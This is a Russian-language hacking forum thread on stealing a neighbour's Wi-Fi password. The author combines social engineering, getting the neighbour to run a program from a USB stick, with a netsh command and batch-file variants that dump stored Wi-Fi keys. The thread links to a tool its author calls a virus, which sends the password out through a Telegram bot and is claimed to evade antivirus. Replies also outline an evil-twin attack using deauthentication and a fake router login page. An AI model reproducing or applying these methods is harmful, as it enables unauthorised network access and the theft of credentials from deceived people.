Загрузка...

Как взломать соседский wifi быстро и просто | социнженерия + по

Тема в разделе Wi-Fi создана пользователем Енот272_inactive171964 21 сен 2017. 11 403 просмотра

Загрузка...
Опрос

Что делать дальше?

1. + Вирус массового слива Wifi по городу

72
    77,4%
  2. + Курс по GNU\Linux

9
    9,7%
  3. + Мне нравится вариант из коментариев

0
    0%
  4. - Не писать больше ничего

12
    12,9%
  1. Енот272_inactive171964
    Енот272_inactive171964 Автор темы 21 сен 2017 Ушел на покой 372 6 сен 2017
    Программа обновилась, права админа больше не нужны, кому нужно - перекачать https://yadi.sk/d/mMkH0mr33NNiES

Ой, автор предупреждает, что данное ПО является безобидной шуткой и отвечать за использование данного софта - противозаконно и не благоразумно. Лучше закройте эту страницу, браузер, ноутбук, дверь балкона, окно - снаружи.

Дано:
    • Соседский Wi-Fi;
    • C нормальным WPA2 паролем;
    • WPS отключен;
    • Cбросить настройки WPS не получается.
    Решение:

У каждого человека есть свои потребности. Давайте исходить из них. Какие бы у вас с соседями отношения не были, даже если вы не раз срались (обычно хороший вайфай у людей на одной лестничной клетке), люди любят выполнять чужие просьбы по-соседски. Работает как "пить дать". А работает почему? Это старое явление - советское я бы сказал - миф о взаимопомощи, который распространяли при СССР. Его нужно использовать. Купите пакет сока - попросите соседа услугу за него - посмотреть программу с флешки, что тебе дали на работе/учебе/lolzteam.org и просто подсмотри его вайфай пароль простой командой в терминале:
    • Код
      netsh.exe wlan show profiles name="ИМЯ ВАФЛИ" key=clear

Да, бро, это не очень способ, знаю. Много букв набирать, да еще нужно знать назубок имя точки доступа. Есть и другой вариант.
    • Создай батник с этой командой и просто заранее впиши имя точки доступа:
    1. netsh.exe wlan show profiles name="TP-LINK_Name" key=clear
    2. pause
    Так ты можешь увидеть его пароль в режиме нон стоп, но этот вариант сработает только в том случае, если соседушка не "стоит у тебя над душой", не смотрит в экран, ожидая, что ты полезешь в его никому ненужные папки с мемами трехлетней давности скопираванные с пикабу.
    Можно сделать по другому. Батник сделать ексзешником, с помощью специальной утилиты, а команду немного видоизменить:
    1. netsh.exe wlan show profiles name="TP-LINK_Name" key=clear > lolz.txt
    Так на твоей флешке появится файл с паролем от вайфая соседушки. Но могут, если сосед реально смотрит за каждым твоим действием, возникнуть вопросы относительно того, что за фигню ты творишь. И так из хакера ты можешь превратиться в отпидоренного кулхацкера. В довершение к тому ты лишишь себя пакетика сока, который останется у соседа за страдания, и как самый паршивый вариант флешки, если у соседушки есть яйки.

Какой же решение я могу предложить тебе? Да, самое простое. Не нужно делать батников, не нужно стараться маскировать под что то там файлы, воспользуйся готовой софтиной. Назову ка её - Wifi-кряк :)

На вирустотал свои вирусу сливают только мудаки:
    https://yadi.sk/d/mMkH0mr33NNiES (Да это вирус)

Функционал её очень прост. Такой же как и описанный наверху. За исключением маскировки от соседушки, ну и присылкой файла с паролем через телеграмм. ДА КАК ВСЕГДА ЧЕРЕЗ ТЕЛЕГРАМ. Боту я дал имя @wardriving_lolz_bot, найди его, добавь к себе и перед тем как запустить вирус, нажми кнопочку "/start", или введи этот текст сам.

Итак, соседушка ничего не знает. Ты за пакет сока, получил желанный пароль. Что теперь? А теперь ты можешь идти дальше и получить пароль у другого соседа и так обеспечить себя интернетом на год-два. Роутеры меняются в среднем с такой периодичностью. Уже не встретить dir-300 и других представителей каменного века, их места занимают tplinkи и другие так же хорошо ломающиеся представители китайской промышленности.

Какой вывод нужно сделать? Нужно сделать вывод такой - социальная инженерия это хорошо, но нужно еще учить матчасть. Или хотя бы уметь находить готовые решения в гугле или открытые исходники программ на гитхабе, ваш коллега и такой же начинающий крякер, активно пользуется поиском, для решения множества вопросов по программированию.

Итак, о чем нужно писать следующую статью? Да так, что бы не было слишком сложно новичкам, да при этом было интересно и бывалым?
    • Есть еще не до конца реализованный скрипт массового вскрытия точек доступа по городу.
    • Могу запилить многочасовой курс по gnu/linux с созданием собственного дистра заточеного под взлом, на базе ubuntu server/archlinux, kalitolin/blackarch и virtualbox'а, причем возможно сделать так, что бы вы могли скачать уже готовый дистр, и запилить к себе на виртуалку.
    • Третий вариант, предложите вы. Буду рад любой активности, буду знать, что все не зря.
    #МояСтатья

21 сен 2017 Изменено
  2. xdddddd
    xdddddd 21 сен 2017 привет 828 7 июл 2017
  3. sadness777
    sadness777 21 сен 2017 Заблокирован(а) 143 12 сен 2017
    Как wifi только не понял взломать, а о чем тема? Я прочитал набор слов и букв только

4. Енот272_inactive171964
    Енот272_inactive171964 Автор темы 21 сен 2017 Ушел на покой 372 6 сен 2017
    Видео посмотри, там как раз для глупых.

5. chiosh
    chiosh 1 окт 2017 Чем жиже мысли,тем гуще их понос. 5 4 ноя 2016
    Где взять этот бот @wardriving_lolz_bot и как его с телеграм связать?

6. Atlant90
    Atlant90 1 окт 2017 0 30 сен 2017
    поддерживаю

7. fesuk
    fesuk 1 окт 2017 You can't see me, You can't stop me... 161 31 авг 2017
    видал где-то тему что проще выбить досс атакой вай-фай соседа, включить моментально свою точку доступа с кейлогером и всё, никуда ходить не надо

8. Енот272_inactive171964
    Енот272_inactive171964 Автор темы 1 окт 2017 Ушел на покой 372 6 сен 2017
    Поверь бро, не всё работает так хорошо, как работает в теории. Такой способ не так прост как этот. Могу объяснить подробнее. А то еще налетят *кулхацкеры* и будут меня ругать, тем что я ничего не понимаю.
    Смотри, у нас две точки доступа:

1) в режиме мониторинга - она аттакует роутер "клиента", гасит его. Конечно утилита mdk3 клевая(и вайфай джампер ненужен), но роутеры тоже не из говна сделаны. Клиентский роутер может просто зависнуть. Но остаться раздатчиком сигнала для устройств.

2) вторая наша точка доступа - в обычном режиме принимает подключение клиента и переадресует на апач который крутится у нас на локальной машине, на апаче крутится фейковая страница логина в роутер. Не факт, что через стены мы обеспечим "достоиный сигнал", не факт, что "устройства клиента" вообще будут коннектится к нашему роутеру, даже если мы переделаем на все сто процентов мак и тд. И не факт, что юзер вообще поведется на такую фейковую страницу. А если и поведется, то может так же поменять пароль через секунду.

Конечно всегда есть решения, наподобие докупить антенну... Но это не наш способ. Мы экономим.
    Мой способ реально экономит время, к тому же переборы WPS пинов это тоже долго на нынешних роутеров с таймаутом на 60 секунд, про уникальный пасс под WPA2 вообще молчу.

9. fesuk
    чувак, я в общаге раздавал вай-фай на весь блок со своего ноута... это говно работало лучше чем роутер нормальный.
    Да способ не такой простой как первый, но:
    1. Ни один антивирусник от такой фигни не убережет
    2. Не надо никуда ходить
    3. Если и узнают что пиздят вай-фай, то подозрений на тебя не будет
    4. Взламывать надо с умом, а не угробить всё что есть поблизости

10. Енот272_inactive171964
    Бывает, клевый ноутбук значит, у меня лично, пришлось переставлять пять модулей вафли от разных ноутов, что бы найти лучший. Могу потом пруф скинуть.
    Антивирусник не убежит и от моего способа.
    Живу два года так и норм, пока не спалился.

11. Енот272_inactive171964

Распаковываем архив, окрываем файл, что на скрине снизу: https://yadi.sk/d/J4vNYmtd3NLY93
    Заводим своего бота у ботфазера Krd2club, как это делается я уже рассказывал и в роликах и в предыдущих темех, копируем токен своего бота в файл , что на скрине в поле токен.

находим своего бота и тестим, как в ролике. если есть еще вопросы пишет, отвечу. сейчас 4 часа утра у мну, голова не варит.

12. Енот272_inactive171964
    Я перепробывал очень много способов и железяк, поверь, там где я живу стены не из картона, и что бы нормально работать с
    соседской вафлей, или хотябы жить на ней, роутер нужно было ставить как можно в плотную к стене и крепить к ней же скотчем.
    И не всегда самая лучшая сеть по расстоянию к тебе - самая взломостойкая. Короче, можно долбиться с вардайвингом всю жизнь,
    а можно жить тут и сейчас, на вафле соседей, таким способом.

13. fesuk
    чувак, большинство юзеров этого форума живут у родителей под сиськой (не в обиду никому) и скоро вырвутся от них на свои хлева во всякие пту, шараги и прочие места, жить конечно же большинство из них пойдет в общежитие... стены в общежитии хочу тебе сказать хорошо хоть не с картона сделаны, а вай-фай есть в любом блоке. идти как бы к соседям чтобы что-то скинуть на флеху с чужого пк нет смысла, ибо у тебя в комнате около 3-4 пк есть (палевно не правда ли?) так что самый более подходящий способ будет не тот что есть у тебя в теме... да и обход антивируса у тебя в теме то хоть делает сие чудо?

14. Енот272_inactive171964
    Хоспаде, вот антивирусом оно не палится, это точно, проверено, исходники тут, не ругать, было сделано в качестве эксперемента с костылями, немножко питона, немножко powershell https://github.com/enot-pogromist/wardriving_society_bot

15. Енот272_inactive171964
    А насчет обхода антивирусов, даже не заморачивайся, если самописные проги, они так серьезно не работают.

16. chiosh
    Спасибо за ответ, скачал аржив 2 раза,пишет архив поврежден или имеет неизвестный формат

17. Енот272_inactive171964
    щас проверю

18. Енот272_inactive171964
    Наверно у тебя с инетом что то не то. Перелил на облако мейла https://cloud.mail.ru/public/Dmiv/WXQFtLWDo

19. chiosh
  20. chiosh
    Тоже самое даже с отключенным антивурусом,ладно забью на это дело,тебе спасибо ,извини что побеспокоил